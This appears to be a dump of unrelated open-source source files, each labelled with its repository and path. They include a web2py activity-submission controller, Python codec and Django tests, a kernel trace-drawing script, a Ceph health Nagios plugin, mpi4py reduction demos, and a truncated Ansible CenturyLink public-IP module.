campo status e a sala db.atividades.status.readable = \ db.atividades.status.writable = False db.atividades.id_sala.readable = \ db.atividades.id_sala.writable = False # Gera o formulário para inserir novas atividades form = SQLFORM(atividade,formstyle='divs',submit_button=T('Save'),_class='forms') # Captura o id do usuário logado no momento e popula no respectivo campo do formulário form.vars.id_usuario = session.auth.user.id # Faz a consulta no banco de dados para pegar o id do currículo do palestrante curriculo_id = db(curriculo.id_usuario==session.auth.user.id).select().first() # Popula o respectivo campo do id do currículo do usuário if not curriculo_id: redirect(URL('atividades', 'minicurriculo')) else: form.vars.id_curriculo = curriculo_id.id # Popula o status da atividade: 0 = Rejeitado, 1 = Aprovado, 2 = Pendente form.vars.status = 'Pendente' # Verifica se os dados inseridos passam em todas as validações do banco de dados e formulário if form.accepts(request.vars, session): session.flash = "Atividade submetida com sucesso" redirect(URL('atividades', 'index', args=session.auth.user.id)) elif form.errors: session.flash = "Erro ao inserir a Atividade. Abra o formulário e tente novamente." return dict(form=form) @auth.requires_membership('Palestrante') def editar(): """ Edita a palestra selecionada pelo palestrante. """ # Capturando o ID da Atividade selecionada id_atividade = request.args(0) or redirect(URL('atividades','index')) # Ocultando o campo ID e o Status db.atividades.id.readable = \ db.atividades.id.writable = False db.atividades.status.readable = \ db.atividades.status.writable = False # Criando o formulario de edicao form = SQLFORM(db.atividades, id_atividade,formstyle='divs',submit_button=T('Save'),_class='forms') if form.accepts(request.vars, session): session.flash = "Atividade atualizado com sucesso." redirect(URL('atividades', 'index', args=session.auth.user.id)) elif form.errors: session.flash = "Erro ao inserir a Atividade. Abra o formulário e tente novamente." return dict(form=form) @auth.requires_membership('Palestrante') def minicurriculo(): """ Essa função é para criar/atualizar mini-currículo """ # Captura o id do usuário logado id_user = session.auth.user.id # Consulta no banco para pegar o currículo do palestrante, caso houver atualizar = db(curriculo.id_usuario==id_user).select().first() # Se houver mini-currículo cadastrado, retorna o formulário para atualização if minicurriculo: # Ocultando o ID db.curriculo.id.readable = db.curriculo.id.writable = False form = SQLFORM(curriculo, atualizar, submit_button=T('Save')) form.vars.id_usuario = id_user # Caso não houver, retorna o formulário para criação else: form = SQLFORM(curriculo,formstyle='divs',submit_button=T('Save'),_class='forms') form.vars.id_usuario = id_user # Verifica se os dados inseridos batem com todas as validações e redireciona para Index, caso esteja ok. if form.accepts(request.vars, session): session.flash = 'Currículo atualizado com sucesso' redirect(URL('default', 'index')) elif form.errors: session.flash = "Mini-currículo não foi cadastrado com sucesso. Tente novamente" return dict(form=form) @auth.requires_membership('Administrador') def detalhes(): """ Exibe todos os detalhes da atividade selecionada. Com isso somente dois campos serão exibidos para edição: - Status da Atividade; - Sala da Atividade; """ id_atividade = request.args(0) # Pesquisa a atividade selecionada atividade = db(db.atividades.id == id_atividade).select().first() # Ocultando o ID do formulario db.atividades.id.readable = False # Se o argumento for igual a valor sala, # então exibe o formulario para associar uma sala # da atividade. Caso o valor seja status, então # exibe um formulário para alterar o status da atividade # selecionada. if request.args(1) == 'sala': form = SQLFORM(db.atividades,id_atividade,fields=['id_sala'],formstyle='divs',submit_button=T('Save')) return dict(atividade = atividade, form = form) elif request.args(1) == 'status': form = SQLFORM(db.atividades,id_atividade,fields=['status'],formstyle='divs',submit_button=T('Save')) return dict(atividade = atividade, form = form) if form.accepts(request.vars,session): session.flash = "Atividade atualizada com sucesso." elif form.errors: session.flash = "Erro ao atualizar a atividade, Verifique se foi atualizado a sala e/ou status." return dict(atividade = atividade, form = form) def cancelar(): """ Cancela a atividade selecionada pelo palestrante. """ # Captura o ID ou redireciona id_atividade = request.args(0) or redirect(URL('atividades','index')) # Cancela a atividade db(db.atividades.id == id_atividade).update(status='Cancelada') # Volta para a lista de atividades cadastradas redirect(URL('atividades','index')) # Exibe mensagem de sucesso session.flash = "Atividade cancelada com sucesso." return dict()
harmy/kbengine
refs/heads/master
kbe/src/lib/python/Lib/test/test_codecmaps_jp.py
57
#!/usr/bin/env python3 # # test_codecmaps_jp.py # Codec mapping tests for Japanese encodings # from test import support from test import test_multibytecodec_support import unittest class TestCP932Map(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'cp932' mapfileurl = 'http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/' \ 'WINDOWS/CP932.TXT' supmaps = [ (b'\x80', '\u0080'), (b'\xa0', '\uf8f0'), (b'\xfd', '\uf8f1'), (b'\xfe', '\uf8f2'), (b'\xff', '\uf8f3'), ] for i in range(0xa1, 0xe0): supmaps.append((bytes([i]), chr(i+0xfec0))) class TestEUCJPCOMPATMap(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'euc_jp' mapfilename = 'EUC-JP.TXT' mapfileurl = 'http://people.freebsd.org/~perky/i18n/EUC-JP.TXT' class TestSJISCOMPATMap(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'shift_jis' mapfilename = 'SHIFTJIS.TXT' mapfileurl = 'http://www.unicode.org/Public/MAPPINGS/OBSOLETE' \ '/EASTASIA/JIS/SHIFTJIS.TXT' pass_enctest = [ (b'\x81_', '\\'), ] pass_dectest = [ (b'\\', '\xa5'), (b'~', '\u203e'), (b'\x81_', '\\'), ] class TestEUCJISX0213Map(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'euc_jisx0213' mapfilename = 'EUC-JISX0213.TXT' mapfileurl = 'http://people.freebsd.org/~perky/i18n/EUC-JISX0213.TXT' class TestSJISX0213Map(test_multibytecodec_support.TestBase_Mapping, unittest.TestCase): encoding = 'shift_jisx0213' mapfilename = 'SHIFT_JISX0213.TXT' mapfileurl = 'http://people.freebsd.org/~perky/i18n/SHIFT_JISX0213.TXT' def test_main(): support.run_unittest(__name__) if __name__ == "__main__": test_main()
Team-Blackout/mecha-3.0.xx
refs/heads/master
scripts/tracing/draw_functrace.py
14679
#!/usr/bin/python """ Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com> Licensed under the terms of the GNU GPL License version 2 This script parses a trace provided by the function tracer in kernel/trace/trace_functions.c The resulted trace is processed into a tree to produce a more human view of the call stack by drawing textual but hierarchical tree of calls. Only the functions's names and the the call time are provided. Usage: Be sure that you have CONFIG_FUNCTION_TRACER # mount -t debugfs nodev /sys/kernel/debug # echo function > /sys/kernel/debug/tracing/current_tracer $ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func Wait some times but not too much, the script is a bit slow. Break the pipe (Ctrl + Z) $ scripts/draw_functrace.py < raw_trace_func > draw_functrace Then you have your drawn trace in draw_functrace """ import sys, re class CallTree: """ This class provides a tree representation of the functions call stack. If a function has no parent in the kernel (interrupt, syscall, kernel thread...) then it is attached to a virtual parent called ROOT. """ ROOT = None def __init__(self, func, time = None, parent = None): self._func = func self._time = time if parent is None: self._parent = CallTree.ROOT else: self._parent = parent self._children = [] def calls(self, func, calltime): """ If a function calls another one, call this method to insert it into the tree at the appropriate place. @return: A reference to the newly created child node. """ child = CallTree(func, calltime, self) self._children.append(child) return child def getParent(self, func): """ Retrieve the last parent of the current node that has the name given by func. If this function is not on a parent, then create it as new child of root @return: A reference to the parent. """ tree = self while tree != CallTree.ROOT and tree._func != func: tree = tree._parent if tree == CallTree.ROOT: child = CallTree.ROOT.calls(func, None) return child return tree def __repr__(self): return self.__toString("", True) def __toString(self, branch, lastChild): if self._time is not None: s = "%s----%s (%s)\n" % (branch, self._func, self._time) else: s = "%s----%s\n" % (branch, self._func) i = 0 if lastChild: branch = branch[:-1] + " " while i < len(self._children): if i != len(self._children) - 1: s += "%s" % self._children[i].__toString(branch +\ " |", False) else: s += "%s" % self._children[i].__toString(branch +\ " |", True) i += 1 return s class BrokenLineException(Exception): """If the last line is not complete because of the pipe breakage, we want to stop the processing and ignore this line. """ pass class CommentLineException(Exception): """ If the line is a comment (as in the beginning of the trace file), just ignore it. """ pass def parseLine(line): line = line.strip() if line.startswith("#"): raise CommentLineException m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line) if m is None: raise BrokenLineException return (m.group(1), m.group(2), m.group(3)) def main(): CallTree.ROOT = CallTree("Root (Nowhere)", None, None) tree = CallTree.ROOT for line in sys.stdin: try: calltime, callee, caller = parseLine(line) except BrokenLineException: break except CommentLineException: continue tree = tree.getParent(caller) tree = tree.calls(callee, calltime) print CallTree.ROOT if __name__ == "__main__": main()
wqshi/test
refs/heads/master
scipy_central/tagging/admin.py
5
from django.contrib import admin from models import Tag class TagAdmin(admin.ModelAdmin): list_display = ('slug', 'name', 'tag_type', 'description', 'id') list_display_links = ('slug',) list_per_page = 1000 ordering = ('slug',) admin.site.register(Tag, TagAdmin)
MER-GROUP/intellij-community
refs/heads/master
python/lib/Lib/hashlib.py
82
# $Id: hashlib.py 66095 2008-08-31 16:36:21Z gregory.p.smith $ # # Copyright (C) 2005 Gregory P. Smith (greg@electricrain.com) # Licensed to PSF under a Contributor Agreement. # __doc__ = """hashlib module - A common interface to many hash functions. new(name, string='') - returns a new hash object implementing the given hash function; initializing the hash using the given string data. Named constructor functions are also available, these are much faster than using new(): md5(), sha1(), sha224(), sha256(), sha384(), and sha512() More algorithms may be available on your platform but the above are guaranteed to exist. Choose your hash function wisely. Some have known collision weaknesses. sha384 and sha512 will be slow on 32 bit platforms. Hash objects have these methods: - update(arg): Update the hash object with the string arg. Repeated calls are equivalent to a single call with the concatenation of all the arguments. - digest(): Return the digest of the strings passed to the update() method so far. This may contain non-ASCII characters, including NUL bytes. - hexdigest(): Like digest() except the digest is returned as a string of double length, containing only hexadecimal digits. - copy(): Return a copy (clone) of the hash object. This can be used to efficiently compute the digests of strings that share a common initial substring. For example, to obtain the digest of the string 'Nobody inspects the spammish repetition': >>> import hashlib >>> m = hashlib.md5() >>> m.update("Nobody inspects") >>> m.update(" the spammish repetition") >>> m.digest() '\\xbbd\\x9c\\x83\\xdd\\x1e\\xa5\\xc9\\xd9\\xde\\xc9\\xa1\\x8d\\xf0\\xff\\xe9' More condensed: >>> hashlib.sha224("Nobody inspects the spammish repetition").hexdigest() 'a4337bc45a8fc544c03f52dc550cd6e1e87021bc896588bd79e901e2' """ def __get_builtin_constructor(name): if name in ('SHA1', 'sha1'): import _sha return _sha.new elif name in ('MD5', 'md5'): import _md5 return _md5.new elif name in ('SHA256', 'sha256', 'SHA224', 'sha224'): import _sha256 bs = name[3:] if bs == '256': return _sha256.sha256 elif bs == '224': return _sha256.sha224 elif name in ('SHA512', 'sha512', 'SHA384', 'sha384'): import _sha512 bs = name[3:] if bs == '512': return _sha512.sha512 elif bs == '384': return _sha512.sha384 raise ValueError, "unsupported hash type" def __py_new(name, string=''): """new(name, string='') - Return a new hashing object using the named algorithm; optionally initialized with a string. """ return __get_builtin_constructor(name)(string) def __hash_new(name, string=''): """new(name, string='') - Return a new hashing object using the named algorithm; optionally initialized with a string. """ try: return _hashlib.new(name, string) except ValueError: # If the _hashlib module (OpenSSL) doesn't support the named # hash, try using our builtin implementations. # This allows for SHA224/256 and SHA384/512 support even though # the OpenSSL library prior to 0.9.8 doesn't provide them. return __get_builtin_constructor(name)(string) try: import _hashlib # use the wrapper of the C implementation new = __hash_new for opensslFuncName in filter(lambda n: n.startswith('openssl_'), dir(_hashlib)): funcName = opensslFuncName[len('openssl_'):] try: # try them all, some may not work due to the OpenSSL # version not supporting that algorithm. f = getattr(_hashlib, opensslFuncName) f() # Use the C function directly (very fast) exec funcName + ' = f' except ValueError: try: # Use the builtin implementation directly (fast) exec funcName + ' = __get_builtin_constructor(funcName)' except ValueError: # this one has no builtin implementation, don't define it pass # clean up our locals del f del opensslFuncName del funcName except ImportError: # We don't have the _hashlib OpenSSL module? # use the built in legacy interfaces via a wrapper function new = __py_new # lookup the C function to use directly for the named constructors md5 = __get_builtin_constructor('md5') sha1 = __get_builtin_constructor('sha1') sha224 = __get_builtin_constructor('sha224') sha256 = __get_builtin_constructor('sha256') sha384 = __get_builtin_constructor('sha384') sha512 = __get_builtin_constructor('sha512')
PetePriority/home-assistant
refs/heads/dev
homeassistant/helpers/icon.py
19
"""Icon helper methods.""" from typing import Optional def icon_for_battery_level(battery_level: Optional[int] = None, charging: bool = False) -> str: """Return a battery icon valid identifier.""" icon = 'mdi:battery' if battery_level is None: return icon + '-unknown' if charging and battery_level > 10: icon += '-charging-{}'.format( int(round(battery_level / 20 - .01)) * 20) elif charging: icon += '-outline' elif battery_level <= 5: icon += '-alert' elif 5 < battery_level < 95: icon += '-{}'.format(int(round(battery_level / 10 - .01)) * 10) return icon
upadhyay-prashant/puppet-rjil
refs/heads/master
files/tests/ceph_health.py
31
#!/usr/bin/env python # # Copyright (c) 2013 SWITCH http://www.switch.ch # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import argparse import os import subprocess import sys __version__ = '1.0.1' # default ceph values CEPH_COMMAND = '/usr/bin/ceph' # nagios exit code STATUS_OK = 0 STATUS_WARNING = 1 STATUS_ERROR = 2 STATUS_UNKNOWN = 3 def main(): # parse args parser = argparse.ArgumentParser(description="'ceph health' nagios plugin.") parser.add_argument('-e','--exe', help='ceph executable [%s]' % CEPH_COMMAND) parser.add_argument('-c','--conf', help='alternative ceph conf file') parser.add_argument('-m','--monaddress', help='ceph monitor address[:port]') parser.add_argument('-i','--id', help='ceph client id') parser.add_argument('-k','--keyring', help='ceph client keyring file') parser.add_argument('-d','--detail', help="exec 'ceph health detail'", action='store_true') parser.add_argument('-V','--version', help='show version and exit', action='store_true') args = parser.parse_args() # validate args ceph_exec = args.exe if args.exe else CEPH_COMMAND if not os.path.exists(ceph_exec): print "ERROR: ceph executable '%s' doesn't exist" % ceph_exec return STATUS_UNKNOWN if args.version: print 'version %s' % __version__ return STATUS_OK if args.conf and not os.path.exists(args.conf): print "ERROR: ceph conf file '%s' doesn't exist" % args.conf return STATUS_UNKNOWN if args.keyring and not os.path.exists(args.keyring): print "ERROR: keyring file '%s' doesn't exist" % args.keyring return STATUS_UNKNOWN # build command ceph_health = [ceph_exec] if args.monaddress: ceph_health.append('-m') ceph_health.append(args.monaddress) if args.conf: ceph_health.append('-c') ceph_health.append(args.conf) if args.id: ceph_health.append('--id') ceph_health.append(args.id) if args.keyring: ceph_health.append('--keyring') ceph_health.append(args.keyring) ceph_health.append('health') if args.detail: ceph_health.append('detail') #print ceph_health # exec command p = subprocess.Popen(ceph_health,stdout=subprocess.PIPE,stderr=subprocess.PIPE) output, err = p.communicate() # parse output #print "output:", output #print "err:", err if output: # merge multi-lines of output in one line one_line = output.replace('\n','; ') if one_line.startswith('HEALTH_OK'): #print 'HEALTH OK:', one_line[len('HEALTH_OK')+1:] one_line= one_line[len('HEALTH_OK')+1:].strip() if one_line: print 'HEALTH OK:', one_line else: print 'HEALTH OK' return STATUS_OK elif one_line.startswith('HEALTH_WARN'): print 'HEALTH WARNING:', one_line[len('HEALTH_WARN')+1:] return STATUS_WARNING elif one_line.startswith('HEALTH_ERR'): print 'HEALTH ERROR:', one_line[len('HEALTH_ERR')+1:] return STATUS_ERROR else: print one_line elif err: # read only first line of error one_line = err.split('\n')[0] if '-1 ' in one_line: idx = one_line.rfind('-1 ') print 'ERROR: %s: %s' % (ceph_exec, one_line[idx+len('-1 '):]) else: print one_line return STATUS_UNKNOWN if __name__ == "__main__": sys.exit(main())
Voltir/django-guardian
refs/heads/master
docs/exts.py
109
def setup(app): app.add_crossref_type( directivename = "admin", rolename = "admin", indextemplate = "pair: %s; admin", ) app.add_crossref_type( directivename = "command", rolename = "command", indextemplate = "pair: %s; command", ) app.add_crossref_type( directivename = "form", rolename = "form", indextemplate = "pair: %s; form", ) app.add_crossref_type( directivename = "manager", rolename = "manager", indextemplate = "pair: %s; manager", ) app.add_crossref_type( directivename = "mixin", rolename = "mixin", indextemplate = "pair: %s; mixin", ) app.add_crossref_type( directivename = "model", rolename = "model", indextemplate = "pair: %s; model", ) app.add_crossref_type( directivename = "setting", rolename = "setting", indextemplate = "pair: %s; setting", ) app.add_crossref_type( directivename = "shortcut", rolename = "shortcut", indextemplate = "pair: %s; shortcut", )
aio-libs/aiohttp_session
refs/heads/master
setup.py
1
from setuptools import setup import os import re with open(os.path.join(os.path.abspath(os.path.dirname( __file__)), 'aiohttp_session', '__init__.py'), 'r', encoding='latin1') as fp: try: version = re.findall(r"^__version__ = '([^']+)'$", fp.read(), re.M)[0] except IndexError: raise RuntimeError('Unable to determine version.') def read(f): return open(os.path.join(os.path.dirname(__file__), f)).read().strip() install_requires = ['aiohttp>=3.0.1', 'typing_extensions>=3.7.4; python_version<"3.8"'] extras_require = { 'aioredis': ['aioredis>=1.0.0'], 'aiomcache': ['aiomcache>=0.5.2'], 'pycrypto': ['cryptography'], 'secure': ['cryptography'], 'pynacl': ['pynacl'], } setup(name='aiohttp-session', version=version, description=("sessions for aiohttp.web"), long_description='\n\n'.join((read('README.rst'), read('CHANGES.txt'))), classifiers=[ 'License :: OSI Approved :: Apache Software License', 'Intended Audience :: Developers', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Topic :: Internet :: WWW/HTTP', 'Framework :: AsyncIO', ], author='Andrew Svetlov', author_email='andrew.svetlov@gmail.com', url='https://github.com/aio-libs/aiohttp_session/', license='Apache 2', packages=['aiohttp_session'], python_requires=">=3.5", install_requires=install_requires, include_package_data=True, extras_require=extras_require)
IllusionRom-deprecated/android_platform_tools_idea
refs/heads/master
python/testData/inspections/PyTypeCheckerInspection/RightOperators.py
53
class C(object): pass def test_right_operators(): o = C() xs = [ <warning descr="Expected type 'Integral', got 'C' instead">o</warning> * [], ]
PeterWangIntel/chromium-crosswalk
refs/heads/master
build/android/pylib/utils/device_temp_file_test.py
51
#!/usr/bin/env python # Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Unit tests for the contents of device_temp_file.py. """ import logging import os import sys import unittest from pylib import constants from pylib.device import adb_wrapper from pylib.device import device_errors from pylib.utils import device_temp_file from pylib.utils import mock_calls sys.path.append(os.path.join( constants.DIR_SOURCE_ROOT, 'third_party', 'pymock')) import mock # pylint: disable=F0401 class DeviceTempFileTest(mock_calls.TestCase): def setUp(self): test_serial = '0123456789abcdef' self.adb = mock.Mock(spec=adb_wrapper.AdbWrapper) self.adb.__str__ = mock.Mock(return_value=test_serial) self.watchMethodCalls(self.call.adb) def mockShellCall(self, cmd_prefix, action=''): """Expect an adb.Shell(cmd) call with cmd_prefix and do some action Args: cmd_prefix: A string, the cmd of the received call is expected to have this as a prefix. action: If callable, an action to perform when the expected call is received, otherwise a return value. Returns: An (expected_call, action) pair suitable for use in assertCalls. """ def check_and_return(cmd): self.assertTrue( cmd.startswith(cmd_prefix), 'command %r does not start with prefix %r' % (cmd, cmd_prefix)) if callable(action): return action(cmd) else: return action return (self.call.adb.Shell(mock.ANY), check_and_return) def mockExistsTest(self, exists_result): def action(cmd): if exists_result: return '' else: raise device_errors.AdbCommandFailedError( cmd, 'File not found', 1, str(self.adb)) return self.mockShellCall('test -e ', action) def testTempFileNameAlreadyExists(self): with self.assertCalls( self.mockShellCall('test -d /data/local/tmp'), self.mockExistsTest(True), self.mockExistsTest(True), self.mockExistsTest(True), self.mockExistsTest(False), self.mockShellCall('touch '), self.mockShellCall('rm -f ')): with device_temp_file.DeviceTempFile(self.adb) as tmpfile: logging.debug('Temp file name: %s' % tmpfile.name) def testTempFileLifecycle(self): with self.assertCalls( self.mockShellCall('test -d /data/local/tmp'), self.mockExistsTest(False), self.mockShellCall('touch ')): tempFileContextManager = device_temp_file.DeviceTempFile(self.adb) with mock.patch.object(self.adb, 'Shell'): with tempFileContextManager as tmpfile: logging.debug('Temp file name: %s' % tmpfile.name) self.assertEquals(0, self.adb.Shell.call_count) self.assertEquals(1, self.adb.Shell.call_count) args, _ = self.adb.Shell.call_args self.assertTrue(args[0].startswith('rm -f ')) if __name__ == '__main__': logging.getLogger().setLevel(logging.DEBUG) unittest.main(verbosity=2)
nvoron23/hue
refs/heads/master
desktop/core/ext-py/Django-1.6.10/tests/admin_scripts/custom_templates/project_template/additional_dir/extra.py
701
# this file uses the {{ extra }} variable
BackupTheBerlios/espressopp
refs/heads/master
contrib/mpi4py/mpi4py-1.3/demo/reductions/reductions.py
3
from mpi4py import MPI class Intracomm(MPI.Intracomm): """ Intracommunicator class with scalable, point-to-point based implementations of global reduction operations. """ def __new__(cls, comm=None): return super(Intracomm, cls).__new__(cls, comm) def reduce(self, sendobj=None, recvobj=None, op=MPI.SUM, root=0): size = self.size rank = self.rank assert 0 <= root < size tag = MPI.COMM_WORLD.Get_attr(MPI.TAG_UB)-1 if op in (MPI.MINLOC, MPI.MAXLOC): sendobj = (sendobj, rank) recvobj = sendobj mask = 1 while mask < size: if (mask & rank) != 0: target = (rank & ~mask) % size self.send(recvobj, dest=target, tag=tag) else: target = (rank | mask) if target < size: tmp = self.recv(None, source=target, tag=tag) recvobj = op(recvobj, tmp) mask <<= 1 if root != 0: if rank == 0: self.send(recvobj, dest=root, tag=tag) elif rank == root: recvobj = self.recv(None, source=0, tag=tag) if rank != root: recvobj = None return recvobj def allreduce(self, sendobj=None, recvobj=None, op=MPI.SUM): recvobj = self.reduce(sendobj, recvobj, op, 0) recvobj = self.bcast(recvobj, 0) return recvobj def scan(self, sendobj=None, recvobj=None, op=MPI.SUM): size = self.size rank = self.rank tag = MPI.COMM_WORLD.Get_attr(MPI.TAG_UB)-1 if op in (MPI.MINLOC, MPI.MAXLOC): sendobj = (sendobj, rank) recvobj = sendobj partial = sendobj mask = 1 while mask < size: target = rank ^ mask if target < size: tmp = self.sendrecv(partial, dest=target, source=target, sendtag=tag, recvtag=tag) if rank > target: partial = op(tmp, partial) recvobj = op(tmp, recvobj) else: tmp = op(partial, tmp) partial = tmp mask <<= 1 return recvobj def exscan(self, sendobj=None, recvobj=None, op=MPI.SUM): size = self.size rank = self.rank tag = MPI.COMM_WORLD.Get_attr(MPI.TAG_UB)-1 if op in (MPI.MINLOC, MPI.MAXLOC): sendobj = (sendobj, rank) recvobj = sendobj partial = sendobj mask = 1 flag = False while mask < size: target = rank ^ mask if target < size: tmp = self.sendrecv(partial, dest=target, source=target, sendtag=tag, recvtag=tag) if rank > target: partial = op(tmp, partial) if rank != 0: if not flag: recvobj = tmp flag = True else: recvobj = op(tmp, recvobj) else: tmp = op(partial, tmp) partial = tmp mask <<= 1 if rank == 0: recvobj = None return recvobj
elky/django
refs/heads/master
tests/gis_tests/test_fields.py
36
import copy from django.contrib.gis.db.models.sql import AreaField, DistanceField from django.test import SimpleTestCase class FieldsTests(SimpleTestCase): def test_area_field_deepcopy(self): field = AreaField(None) self.assertEqual(copy.deepcopy(field), field) def test_distance_field_deepcopy(self): field = DistanceField(None) self.assertEqual(copy.deepcopy(field), field)
detiber/ansible
refs/heads/devel
lib/ansible/modules/cloud/centurylink/clc_publicip.py
70
#!/usr/bin/python # # Copyright (c) 2015 CenturyLink # # This file is part of Ansible. # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/> # ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' module: clc_publicip short_description: Add and Delete public ips on servers in CenturyLink Cloud. description: - An Ansible module to add or delete public ip addresses on an existing server or servers in CenturyLink Cloud. version_added: "2.0" options: protocol: description: - The protocol that the public IP will listen for. default: TCP choices: ['TCP', 'UDP', 'ICMP'] required: False ports: description: - A list of ports to expose. This is required when state is 'present' required: False default: None server_ids: description: - A list of servers to create public ips on. required: True state: description: - Determine whether to create or delete public IPs. If present module will not create a second public ip if one already exists. default: present choices: ['present', 'absent'] required: False wait: description: - Whether to wait for the tasks to finish before returning. choices: [ True, False ] default: True required: False requirements: - python = 2.7 - requests >= 2.5.0 - clc-sdk author: "CLC Runner (@clc-runner)" notes: - To use this module, it is required to set the below environment variables which enables access to the Centurylink Cloud - CLC_V2_API_USERNAME, the account login id for the centurylink cloud - CLC_V2_API_PASSWORD, the account password for the centurylink cloud - Alternatively, the module accepts the API token and account alias. The API token can be generated using the CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login - CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login - CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud - Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment. ''' EXAMPLES = ''' # Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples - name: Add Public IP to Server hosts: localhost gather_facts: False connection: local tasks: - name: Create Public IP For Servers clc_publicip: protocol: TCP ports: - 80 server_ids: - UC1TEST-SVR01 - UC1TEST-SVR02 state: present register: clc - name: debug debug: var: clc - name: Delete Public IP from Server hosts: localhost gather_facts: False connection: local tasks: - name: Create Public IP For Servers clc_publicip: server_ids: - UC1TEST-SVR01 - UC1TEST-SVR02 state: absent register: clc - name: debug debug: var: clc ''' RETURN = ''' server_ids: description: The list of server ids that are changed returned: success type: list sample: [ "UC1TEST-SVR01", "UC1TEST-SVR02" ] ''' __version__ = '${version}' import os from distutils.version import LooseVersion try: import requests except ImportError: REQUESTS_FOUND = False else: REQUESTS_FOUND = True # # Requires the clc-python-sdk. # sudo pip install clc-sdk # try: import clc as clc_sdk from clc import CLCException except ImportError: CLC_FOUND = False clc_sdk = None else: CLC_FOUND = True from ansible.module_utils.basic import AnsibleModule class ClcPublicIp(object): clc = clc_sdk module = None def __init__(self, module): """ Construct module """ self.module = module if not CLC_FOUND: self.module.fail_json( msg='clc-python-sdk required for this module') if not REQUESTS_FOUND: self.module.fail_json( msg='requests library is required for this module') if requests.__version__ and LooseVersion(requests.__version__) < LooseVersion('2.5.0'): self.module.fail_json( msg='requests library version should be >= 2.5.0') self._set_user_agent(self.clc) def process_request(self): """ Process the request - Main Code Path :return: Returns with either an exit_json or fail_json """ self._set_clc_credentials_from_env() params = self.module.params server_ids = params['server_ids'] ports = params['ports'] protocol = params['protocol'] state = params['state'] if state == 'present': changed, changed_server_ids, requests = self.ensure_public_ip_present( server_ids=server_ids, protocol=protocol, ports=ports) elif state == 'absent': changed, changed_server_ids, requests = self.ensure_public_ip_absent( server_ids=server_ids) else: return self.module.fail_json(msg="Unknown State: " + state) self._wait_for_requests_to_complete(requests) return self.module.exit_json(changed=changed, server_ids=changed_server_ids) @staticmethod def _define_module_argument_spec(): """ Define the argument spec for the ansible module :return: argument spec dictionary """ argument_spec = dict( server_ids=dict(type='list', required=True), protocol=dict(default='TCP', choices=['TCP', 'UDP', 'ICMP']), ports=dict(type='list'), wait=dict(type='bool', default=True), state=dict(default='present', choices=['present', 'absent']), ) return argument_spec def ensure_public_ip_present(self, server_ids, protocol, ports): """ Ensures the given server ids having the public ip available :param server_ids: the list of server ids :param protocol: the ip protocol :param ports: the list of ports to expose :return: (changed, changed_server_ids, results) changed: A flag indicating if there is any change changed_server_ids : the list of server ids that are changed results: The result list from clc public ip call """ changed = False results = [] changed_server_ids = [] servers = self._get_servers_from_clc( server_ids, 'Failed to obtain server list from the CLC API') servers_to_change = [ server for server in servers if len( server.PublicIPs().public_ips) == 0] ports_to_expose = [{'protocol': protocol, 'port': port} for port in ports] for server in servers_to_change: if not self.module.check_mode: result = self._add_publicip_to_server(server, ports_to_expose) results.append(result) changed_server_ids.append(server.id) changed = True return changed, changed_server_ids, results def _add_publicip_to_server(self, server, ports_to_expose): result = None try: result = server.PublicIPs().Add(ports_to_expose) except CLCException as ex: self.module.fail_json(msg='Failed to add public ip to the server : {0}. {1}'.format( server.id, ex.response_text )) return result def ensure_public_ip_absent(self, server_ids): """ Ensures the given server ids having the public ip removed if there is any :param server_ids: the list of server ids :return: (changed, changed_server_ids, results) changed: A flag indicating if there is any change changed_server_ids : the list of server ids that are changed results: The result list from clc public ip call """ changed = False results = [] changed_server_ids = [] servers = self._get_servers_from_clc( server_ids, 'Failed to obtain server list from the CLC API') servers_to_change = [ server for server in servers if len( server.PublicIPs().public_ips) > 0] for server in servers_to_change: if not self.module.check_mode: result = self._remove_publicip_from_server(server) results.append(result) changed_server_ids.append(server.id) changed = True return changed, changed_server_ids, results def _remove_publicip_from_server(self, server): result = None try: for ip_address in server.PublicIPs().public_ips: result = ip_address.Delete() except CLCException as ex: self.module.fail_json(msg='Failed to remove public ip from the server : {0}. {1}'.format( server.id, ex.response_text )) return result def _wait_for_requests_to_complete(self, requests_lst): """ Waits until the CLC requests are complete if the wait argument is True :param requests_lst: The list of CLC request objects :return: none """ if not self.module.params['wait']: return for request in requests_lst: request.WaitUntilComplete() for request_details in request.requests: if request_details.Status() != 'succeeded': self.module.fail_json( msg='Unable to process public ip request') def _set_clc_credentials_from_env(self): """ Set the CLC Credentials on the sdk by reading environment variables :return: none """ env = os.environ v2_api_token = env.get('CLC_V2_API_TOKEN', False) v2_api_username = env.get('CLC_V2_API_USERNAME', False) v2_api_passwd = env.get('CLC_V2_API_PASSWD', False) clc_alias = env.get('CLC_ACCT_ALIAS', False) api_url = env.get('CLC_V2_API_URL', False) if 